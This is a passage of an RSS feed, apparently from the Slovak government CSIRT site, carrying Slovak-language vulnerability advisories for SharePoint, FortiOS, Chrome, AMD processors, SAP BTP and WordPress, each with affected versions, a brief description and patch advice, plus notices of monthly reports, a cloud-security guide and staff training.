					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SharePoint-Logo.wine_-1024x683.png" alt="" /></p>Aktívne zneužívaná zraniteľnosť v&#160;serveri SharePoint Spoločnosť CISA vydala varovanie pre aktívne zneužívanú zraniteľnosť CVE-2023-29357 v&#160;Microsoft SharePoint Server. Spoločnosť Microsoft vydala...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SharePoint-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Aktívne zneužívaná zraniteľnosť v&nbsp;serveri SharePoint</strong></p>



<p><strong>Spoločnosť CISA vydala varovanie pre aktívne zneužívanú zraniteľnosť CVE-2023-29357 v&nbsp;Microsoft SharePoint Server. Spoločnosť Microsoft vydala záplaty na túto chybu v rámci júnových aktualizácií 2023 Patch Tuesday.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Microsoft SharePoint Server 2019</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-29357 (CVSS skóre 9,8)</strong></p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2023-29357 <strong>sa nachádza v&nbsp;serveri SharePoint a&nbsp;týka&nbsp;sa zvýšenia oprávnení</strong>. Útočník môže chybu zneužiť<strong> odoslaním podvrhnutého autentizačného tokenu JSON Web Token (JWT) na zraniteľný server SharePoint</strong>, čo mu umožňuje <strong>obchádzať autentifikáciu</strong>. Úspešné zneužitie umožňuje <strong>neautentifikovanému útočníkovi získať oprávnenie správcu systému</strong>.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia na </strong><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-29357" target="_blank" rel="noreferrer noopener">najnovšiu verziu</a><strong>. Používatelia, ktorí povolili funkciu </strong><a href="https://learn.microsoft.com/en-us/sharepoint/security-for-sharepoint-server/configure-amsi-integration" target="_blank" rel="noreferrer noopener">integrácie AMSI</a><strong> a používajú Microsoft Defender vo svojej farme (farmách) SharePoint Server, sú pred touto zraniteľnosťou chránení.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.securityweek.com/cisa-urges-patching-of-exploited-sharepoint-server-vulnerability/">https://www.securityweek.com/cisa-urges-patching-of-exploited-sharepoint-server-vulnerability/</a></p>



<p><a href="https://thehackernews.com/2024/01/act-now-cisa-flags-active-exploitation.html">https://thehackernews.com/2024/01/act-now-cisa-flags-active-exploitation.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-29357">https://nvd.nist.gov/vuln/detail/CVE-2023-29357</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-29357">https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-29357</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/115/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť vo FortiOS a FortiProxy</title>
		<link>/posts/112</link>
					<comments>/posts/112#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:48:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=112</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/FORTIOS.jpeg" alt="" /></p>Zraniteľnosť vo FortiOS a FortiProxy Spoločnosť CISA upozorňuje na vysoko závažnú zraniteľnosť CVE-2023-44250, ktorá umožňuje získať kontrolu nad zraniteľnými systémami....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/FORTIOS.jpeg" alt="" /></p>
<p><strong>Zraniteľnosť vo FortiOS a FortiProxy</strong></p>



<p><strong>Spoločnosť CISA upozorňuje na vysoko závažnú zraniteľnosť CVE-2023-44250, ktorá umožňuje získať kontrolu nad zraniteľnými systémami.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p><strong>FortiOS 7.4.0-7.4.1</strong></p>



<p><strong>FortiOS 7.2.5</strong></p>



<p><strong>FortiProxy 7.4.0-7.4.1</strong></p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-44250 (CVSS skóre 8,8)</strong></p>



<p><strong>Vysoko závažná zraniteľnosť</strong> CVE-2023-44250 sa nachádza v&nbsp;klastri <strong>FortiOS &amp; FortiProxy HA</strong> a umožňuje <strong>autentifikovanému útočníkovi vykonávať akcie, vykonateľné iba s vysokými oprávneniami, prostredníctvom upravených požiadaviek HTTP alebo HTTPS.</strong> Úspešné zneužitie umožňuje <strong>získať kontrolu nad zraniteľnými systémami</strong>.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia FortiOS/FortiProxy na verziu 7.2.6/ 7.4.2.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44250">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44250</a></p>



<p><a href="https://www.fortiguard.com/psirt/FG-IR-23-315">https://www.fortiguard.com/psirt/FG-IR-23-315</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-44250">https://nvd.nist.gov/vuln/detail/CVE-2023-44250</a></p>



<p><a href="https://www.tenable.com/plugins/nessus/187809">https://www.tenable.com/plugins/nessus/187809</a></p>



<p><a href="https://malware.news/t/cisa-warned-of-critical-fortinet-vulnerability-cve-2023-44250-and-issued-a-new-ics-advisory/77451">https://malware.news/t/cisa-warned-of-critical-fortinet-vulnerability-cve-2023-44250-and-issued-a-new-ics-advisory/77451</a></p>



<p><a href="https://yanac.hu/2024/01/09/cve-2023-44250-fortinet-fortios-fortiproxy-up-to-7-4-1-ha-request-privileges-management-fg-ir-23-315/">https://yanac.hu/2024/01/09/cve-2023-44250-fortinet-fortios-fortiproxy-up-to-7-4-1-ha-request-privileges-management-fg-ir-23-315/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/112/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností december 2023</title>
		<link>/posts/87</link>
					<comments>/posts/87#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:45:09 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=87</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci december 2023....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci december 2023.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/01/2023_12_mesacnik.pdf" data-type="URL" data-id=":8000/wp-content/uploads/2024/01/2023_12_mesacnik.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 12/2023 PDF (260 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/87/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero-day zraniteľnosť v Google Chrome</title>
		<link>/posts/107</link>
					<comments>/posts/107#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:44:55 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=107</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Na zero-day zraniteľnosť poukázali výskumníci Clément Lecigne a Vlad Stolyarov z&#160;tímu Google Threat Analysis Group (TAG). Chyba súvisí s&#160;pretečením medzipamäte...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Na zero-day zraniteľnosť poukázali výskumníci Clément Lecigne a Vlad Stolyarov z&nbsp;tímu Google Threat Analysis Group (TAG). Chyba súvisí s&nbsp;pretečením medzipamäte na halde v&nbsp;komponente WebRTC a&nbsp;umožňuje vykonávanie ľubovoľného kódu. </strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Mozilla</li>



<li>Firefox</li>



<li>Safari</li>



<li>Microsoft Edge</li>



<li>Brave</li>



<li>Opera</li>



<li>Vivaldi</li>



<li>Google Chrome, verzie staršie ako 120.0.6099.129/130 pre Linux, macOS a&nbsp;Windows.</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-7024</strong></p>



<p>Zero-day zraniteľnosť CVE-2023-7024 sa <strong>týka pretečenia medzipamäte na halde v&nbsp;komponente WebRTC</strong>. Úspešné zneužitie môže viesť k&nbsp;pádu aplikácie alebo umožňuje útočníkom <strong>vykonávanie ľubovoľného kódu</strong>. Na zraniteľnosť poukázali výskumníci Clément Lecigne a Vlad Stolyarov z&nbsp;tímu Google Threat Analysis Group (TAG). <strong>Zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>Zraniteľnosť sa pravdepodobne nachádza aj v&nbsp;ostatných prehliadačoch postavených na platforme Chromium.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľného kódu</strong></li>



<li><strong>Nedostupnosť aplikácie</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia prehliadačov na najnovšiu verziu. Odporúčame aktualizovať Google Chrome aspoň na verziu 120.0.6099.129 pre Mac, Linux a 120.0.6099.129/130 pre Windows.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2023/12/urgent-new-chrome-zero-day.html">https://thehackernews.com/2023/12/urgent-new-chrome-zero-day.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attacks-this-year/">https://www.bleepingcomputer.com/news/security/google-fixes-8th-chrome-zero-day-exploited-in-attacks-this-year/</a></p>



<p><a href="https://chromereleases.googleblog.com/2023/12/stable-channel-update-for-desktop_20.html">https://chromereleases.googleblog.com/2023/12/stable-channel-update-for-desktop_20.html</a></p>



<p><a href="https://securityonline.info/cve-2023-7024-zero-day-vulnerability-threatens-chrome-web-browser/">https://securityonline.info/cve-2023-7024-zero-day-vulnerability-threatens-chrome-web-browser/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/107/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažná zraniteľnosť v procesoroch AMD</title>
		<link>/posts/105</link>
					<comments>/posts/105#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:44:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=105</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/benjamin-lehman-h_ZDeb9taY0-unsplash-scaled-e1703234528151.jpg" alt="" /></p>Spoločnosť Microsoft v&#160;rámci balíka opráv Patch Tuesday vydala opravu pre 34 zraniteľností. Oprava sa týkala aj 1 zero-day zraniteľnosti v&#160;procesoroch...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/benjamin-lehman-h_ZDeb9taY0-unsplash-scaled-e1703234528151.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft v&nbsp;rámci balíka opráv Patch Tuesday vydala opravu pre 34 zraniteľností. Oprava sa týkala aj 1 zero-day zraniteľnosti v&nbsp;procesoroch AMD a&nbsp;jej úspešné zneužitie môže viesť k&nbsp;úniku informácií.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>AMD EPYC<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> 7001 Procesory</strong></li>



<li><strong>AMD Athlon<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> 3000 Procesory s Radeon<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Graphics</strong></li>



<li><strong>AMD Ryzen<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> 3000 Procesory s Radeon<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Graphics</strong></li>



<li><strong>AMD Athlon<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> PRO 3000 Procesory s Radeon<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Vega Graphics</strong><strong></strong></li>



<li><strong>AMD Ryzen<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> PRO 3000 Procesory s Radeon<img src="https://s.w.org/images/core/emoji/14.0.0/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Vega Graphics</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2023-20588 (CVSS skóre 5,5)</strong></p>



<p>Zero-day zraniteľnosť CVE-2023-20588 sa nachádza v procesoroch AMD. Chyba sa <strong>týka delenia nulou</strong>, pričom <strong>môže procesor vrátiť náhodné dáta. Úspešné zneužitie si vyžaduje lokálny prístup útočníka. Zraniteľnosť objavili Jana Hofmann, Emanuele Vannacci, Cédric Fournet, Boris Köpf, Oleksii Oleksenko z tímu Microsoft Azure Research a&nbsp;Univerzita Vrije v&nbsp;Amsterdame.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia systému Windows na najnovšiu verziu.</strong></p>



<p><strong>Vývojárom sa odporúča zabezpečiť, aby sa v operáciách delenia nulou nepoužívali žiadne privilegované údaje, resp. dodržiavať best practices vývoja.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-december-2023-patch-tuesday-fixes-34-flaws-1-zero-day/">https://www.bleepingcomputer.com/news/microsoft/microsoft-december-2023-patch-tuesday-fixes-34-flaws-1-zero-day/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-20588">https://nvd.nist.gov/vuln/detail/CVE-2023-20588</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-20588">https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-20588</a></p>



<p><a href="https://www.crowdstrike.com/blog/patch-tuesday-analysis-december-2023/">https://www.crowdstrike.com/blog/patch-tuesday-analysis-december-2023/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/105/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produkte SAP Business Technology Platform</title>
		<link>/posts/103</link>
					<comments>/posts/103#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:42:37 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=103</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>Spoločnosť SAP vydala v decembri 2023 balík opráv pre svoje produkty opravujúcich 15 zraniteľností v Business Technology Platform, 4 z&#160;nich...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/SAP_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>Spoločnosť SAP vydala v decembri 2023 balík opráv pre svoje produkty opravujúcich 15 zraniteľností v</strong> <strong>Business Technology Platform, 4 z&nbsp;nich sú označené ako kritické. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi eskaláciu privilégií.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 3.6.0 (Node.js)</li>



<li>SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 2.17.0 a&nbsp;3.0-3.3(Java)</li>



<li>SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 4.1.0 (Python)</li>



<li>SAP Business Technology Platform (BTP) Security Services Integration Libraries verzie staršie ako 0.17.0 (Golang)</li>



<li>Cloud Application Programming Model (CAP) JAVA V1 verzie staršie ako 1.34.8</li>



<li>Cloud Application Programming Model (CAP) JAVA V2 verzie staršie ako 2.4.1</li>



<li>SAP Java Buildpack verzie staršie ako 1.81.1</li>



<li>SAP Cloud SDK for Java verzie staršie ako 4.28.0 a 5.0.0</li>



<li>SAP Cloud SDK for Node.js verzie staršie ako 3.9.0</li>



<li>Application Router verzie staršie ako 14.4.3</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>CVE-2023-49583 (Node.js), CVE-2023-50422 (Java), CVE-2023-50423 (Python), CVE-2023-50424 (Golang)</p>



<p>(CVSS skóre 9,1)</p>



<p><strong>Kritické zraniteľnosti sa nachádzajú v&nbsp;knižniciach BTP Security Sevices Integration Libraries. Úspešné zneužitie umožňuje neautentifikovanému útočníkovi eskaláciu privilégií a&nbsp;získanie prístupu do aplikácie.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>VJ CSIRT odporúča bezodkladnú inštaláciu najnovších bezpečnostných záplat pre</strong> <strong>SAP Business Technology Platform (BTP) aspoň na verziu 3.6.0 (Node.js), 3.3.0 alebo 2.17.0 (Java), 4.1.0 (Python) a&nbsp;0.17.0 (Golang).</strong></p>



<p><strong>Podrobné informácie pre mitigáciu </strong><a href="https://blogs.sap.com/2023/12/12/unveiling-critical-security-updates-sap-btp-security-note-3411067"><strong>nájdete v&nbsp;bezpečnostnej poznámke SAP</strong></a><strong>.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.securityweek.com/sap-patches-critical-vulnerability-in-business-technology-platform/">https://www.securityweek.com/sap-patches-critical-vulnerability-in-business-technology-platform/</a></p>



<p><a href="https://onapsis.com/blog/sap-patch-day-december-2023">https://onapsis.com/blog/sap-patch-day-december-2023</a></p>



<p><a href="https://blogs.sap.com/2023/12/12/unveiling-critical-security-updates-sap-btp-security-note-3411067/">https://blogs.sap.com/2023/12/12/unveiling-critical-security-updates-sap-btp-security-note-3411067/</a></p>



<p><a href="https://www.cyber.gc.ca/en/alerts-advisories/sap-security-advisory-december-2023-monthly-rollup-av23-756">https://www.cyber.gc.ca/en/alerts-advisories/sap-security-advisory-december-2023-monthly-rollup-av23-756</a></p>



<p><a href="https://redrays.io/blog/protecting-sap-btp-security-vulnerabilities/">https://redrays.io/blog/protecting-sap-btp-security-vulnerabilities/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50422">https://nvd.nist.gov/vuln/detail/CVE-2023-50422</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50423">https://nvd.nist.gov/vuln/detail/CVE-2023-50423</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-50424">https://nvd.nist.gov/vuln/detail/CVE-2023-50424</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/103/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Závažná zraniteľnosť platformy WordPress</title>
		<link>/posts/96</link>
					<comments>/posts/96#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:42:05 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<guid isPermaLink="false">/?p=96</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>Bezpečnostný tím spoločnosti Fenrisk objavil závažnú zraniteľnosť, ktorá sa nachádza v&#160;jadre &#160;frameworku WordPress. Úspešné zneužitie umožňuje získať neoprávnený prístup ku&#160;webstránkam...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>
<p><strong>Bezpečnostný tím spoločnosti Fenrisk objavil závažnú zraniteľnosť, ktorá sa nachádza v&nbsp;jadre &nbsp;frameworku WordPress. Úspešné zneužitie umožňuje získať neoprávnený prístup ku&nbsp;webstránkam na platforme WordPress a&nbsp;vzdialené vykonávanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>WordPress, verzie 6.4 a 6.4.1</p>



<p><strong>Opis činnosti:</strong></p>



<p>Zraniteľnosť sa nachádza v&nbsp;jadre platformy WordPress a&nbsp;umožňuje <strong>útočníkovi získať kontrolu nad reťazcom POP (Property-Oriented Programming)</strong>. Pri úspešnom <strong>zreťazení s&nbsp;inými zraniteľnosťami dovoľujúcimi injektovať objekty</strong>, napríklad v&nbsp;moduloch alebo témach,môže útočníkovi umožniť <strong>vzdialené vykonávanie kódu PHP, mazať súbory alebo získať citlivé údaje. </strong>&nbsp;Na chybu poukázal bezpečnostný tím spoločnosti Fenrisk, ktorý zistil <strong>problém v&nbsp;triede WP_HTML_Token</strong>. Táto trieda bola integrovaná vo verzii 6.4 na zlepšenie rozboru HTML v&nbsp;blokovom editore.</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Únik informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia na najnovšiu verziu 6.4.2.</strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.securityweek.com/wordpress-6-4-2-patches-remote-code-execution-vulnerability/" target="_blank" rel="noreferrer noopener">https://www.securityweek.com/wordpress-6-4-2-patches-remote-code-execution-vulnerability/</a></p>



<p><a href="https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html" target="_blank" rel="noreferrer noopener">https://thehackernews.com/2023/12/wordpress-releases-update-642-to.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/wordpress-fixes-pop-chain-exposing-websites-to-rce-attacks/" target="_blank" rel="noreferrer noopener">https://www.bleepingcomputer.com/news/security/wordpress-fixes-pop-chain-exposing-websites-to-rce-attacks/</a></p>



<p><a href="https://wordpress.org/news/2023/12/wordpress-6-4-2-maintenance-security-release/" target="_blank" rel="noreferrer noopener">https://wordpress.org/news/2023/12/wordpress-6-4-2-maintenance-security-release/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/96/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – November 2023</title>
		<link>/posts/93</link>
					<comments>/posts/93#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:41:08 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=93</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2023....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2023. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti. Z kapacitných dôvodov však dočasne uverejňujeme skrátenú verziu správy, ktorá obsahuje prehľad z činnosti vládnej jednoty CSIRT a obsah mesačného prehľadu zraniteľností.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2023/12/MS2023-11short.pdf" target="_blank" rel="noreferrer noopener">Mesačná správa – 11/2023 PDF (345&nbsp;KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/93/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Návod: Bezpečné nastavenie prístupu do cloudového prostredia</title>
		<link>/posts/90</link>
					<comments>/posts/90#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 20 Jan 2024 09:39:36 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=90</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>CSIRT.SK vydáva odporúčania, ako si nakonfigurujete bezpečné cloudové prostredie, v ktorom hostujete Vaše služby. Dokument popisuje možnosti viacfaktorovej autentifikácie a...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>CSIRT.SK vydáva odporúčania, ako si nakonfigurujete bezpečné cloudové prostredie, v ktorom hostujete Vaše služby. Dokument popisuje možnosti viacfaktorovej autentifikácie a politiku hesiel, oddelenie účtov s rôznymi oprávneniami, prístupy RBAC a least-privilege, či princíp zero-trust. Zároveň ponúka ďalšie zdroje, ktoré Vám pomôžu pri zabezpečení cloudových platforiem, ktoré používate.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2023/12/cloud_pristupy_odporucanie_web.pdf" target="_blank" rel="noreferrer noopener">Bezpečné nastavenie prístupu do cloudového prostredia (12-2023)</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/90/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Členovia VJ CSIRT úspešne absolvovali školenie CyberOps</title>
		<link>/posts/361</link>
					<comments>/posts/361#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 01 Jan 2024 08:21:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[CyberOps]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=361</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cyberops-1024x663.jpg" alt="" /></p>Členovia Vládnej jednotky CSIRT (VJ CSIRT) sa zúčastnili školenia CyberOps, ktoré sa uskutočnilo v rámci letnej školy Cisco Networking Academy...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cyberops-1024x663.jpg" alt="" /></p>
<p>Členovia Vládnej jednotky CSIRT (VJ CSIRT) sa zúčastnili školenia CyberOps, ktoré sa uskutočnilo v rámci letnej školy Cisco Networking Academy FIIT STU. Školenie prebiehalo po dobu dvoch mesiacov, s dvomi stretnutiami týždenne v priestoroch laboratórií Kybernetickej bezpečnosti, sieťových technológií a Internetu vecí v budove FIIT STU. Cieľom absolvovania kurzu bolo zvýšenie spôsobilosti členov VJ CSIRT v oblasti kybernetickej bezpečnosti.</p>



<p>Počas dvoch mesiacov naši kolegovia získali skúsenosti vo viacerých oblastiach. Program zahŕňal širokú škálu tém, vrátane etického hackovania, penetračného testovania, bezpečnosti operačných systémov Linux a Windows systémov, zálohy a obnovovania dát, forenznej analýzy a práce s nástrojmi na bezpečnostný monitoring, Security Information and Event Management (SIEM).</p>



